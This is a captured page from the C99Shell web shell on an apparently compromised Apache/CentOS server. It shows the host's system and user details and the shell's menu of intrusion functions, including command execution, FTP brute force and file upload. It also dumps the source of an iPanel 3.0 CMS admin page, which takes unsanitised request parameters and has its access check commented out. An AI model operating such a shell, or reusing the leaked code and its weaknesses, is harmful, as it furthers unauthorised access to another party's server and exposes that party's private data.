!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/var/www/html/site/ipanel/view/   drwxr-xr-x
Free 9.41 GB of 93.48 GB (10.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (4.99 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

//ini_set('display_errors',1);
//ini_set('display_startup_erros',1);
//error_reporting(E_ALL);
/**
 *  iPanel Control Admin 3.0
 *  index.php
 *  Arquivo de Mostra de dados do Sistema
 *
 *  Pertencente ao pacote admin.view
 *
 *  Copyright (C) 2011  iMAXIS Soluções Digitais Ltda
 *  Autor: Cledson Lodi
 *
 *  Criado em 06/09/2011
 */
   //session_start();

    /* Define o limitador de cache para 'private' */
    
session_cache_limiter('private');
    
$cache_limiter session_cache_limiter();

    
/* Define o limite de tempo do cache em 50 minutos */
    
session_cache_expire(50);
    
$cache_expire session_cache_expire();
    
header("Expires: Tue, 01 Jan 2000 00:00:00 GMT");
    
header("Last-Modified: " gmdate("D, d M Y H:i:s") . " GMT");
    
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
    
header("Cache-Control: post-check=0, pre-check=0"false);
    
header("Pragma: no-cache");
   require_once(
"../app/core/config.php");
   require_once(
APP_PATH."/cms/restritoIPanel.php");
   require_once(
APP_PATH."/cms/functions.php");
   require_once(
APP_PATH."/cms/IPanelApp.php");
   require_once(
APP_PATH."/util/Util.php");
   require_once(
APP_PATH."/util/Data.php");

   
$util = new Util();
   
$data = new Data();

   
$ipanel = new IPanelApp();
   
$ipanel -> setMode($_GET['md']);           // seta o modo da classe (Lista - Form)
   
$ipanel -> setArea($_GET['lc']);           // seta o local atual a ser mostrado
   
$ipanel->setConfig();
   
$ipanel->setMenu();

  
/* foreach($_SESSION['permissoes'] as $permissao){
       echo $permissao['local']." : ".$permissao['acao']."<br>";
   }*/

  // $VerifAcesso = (($_GET['Lc'] == "Usuarios") ||($_GET['Lc'] == "Backup")||($_GET['Lc'] == "Revendas"))?"Sistema":$_GET['Lc'];
 //  Permissao($VerifAcesso,$User_Permissao);   // Verifica se o usuário tem permissão de acesso a esta área

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>CMS - Setor Administrativo iPanel 3.0</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<script type="text/javascript" src="https://www.google.com/jsapi"></script>
<script src="../js/ipanel.js"    type="text/javascript" language="javascript"></script>
<script src="../js/validator.js" type="text/javascript" language="javascript"></script>
<script src="../js/mask.js"      type="text/javascript" language="javascript"></script>
<script src="../js/validatorFunctions.js"   type="text/javascript" language="javascript"></script>
<script src="../js/funcoes.js"   type="text/javascript" language="javascript"></script>
<script src="../js/tiny_mce/tiny_mce.js" type="text/javascript" ></script>
<script src="../js/tiny_mce/tiny_mce_init.js" type="text/javascript"></script>
<script src="../js/color.select.js" type="text/javascript" ></script>
<script src="../js/lytebox.js" type="text/javascript" ></script>

<?php 
    
if($_GET['md'] == "Form"){
        print 
$ipanel->writeValidationScript();
    }
?>
<script type="text/javascript">
function refreshSession() {
    $.ajax({
        url:"../app/cms/refreshSession.php",
        success:function(html){
           setTimeout("refreshSession()", 60000);
        }
    });
}

refreshSession();

</script>
<style type="text/css">

label.error {
    width:300px !important;
    color:red;
    margin-left:5px !important;
    text-align:left !important;
}

</style>
<link href="css/style.css" rel="stylesheet" type="text/css" />
<link href="css/color.select.css" rel="stylesheet" type="text/css" />
<link media="screen" type="text/css" href="css/lytebox.css" rel="stylesheet"/>
</head>
<body>
<div id="imxDoc">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
    <tr>
    <td>
    <div id="imxBody">
        <?php  include "modTopo.php" ?>
        <div id="imxAlert"></div>        
        <div id="imxStage">        
            <?php   
                   $ipanel
->getMenu()->writeMenuTabs();
            
?>
            <div class="stage">
                    <div class="stage_conteudo">
                     <?=  $ipanel->output() ?>
                    <span class="stcl"></span>
                    <span class="stcr"></span>
                    <div class="clear"></div>
                </div>
                <div class="clear"></div> 
            </div> 
            <div class="clear"></div>           
        </div>
        <div class="clear"></div>
    </div>
    <div class="clear"></div>
    <?php   include "modRodape.php" ?>
    <div class="clear"></div>
    </td>
    <div class="clear"></div>
    </tr>
    <div class="clear"></div>
</table>
<div class="clear"></div>
</div>
<div class="clear"></div>
</body>
</html>
<script type="text/javascript">
    showTab('<?=  $util->nameForWeb($ipanel->getMenu()->getCurrentTab()) ?>');
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0034 ]--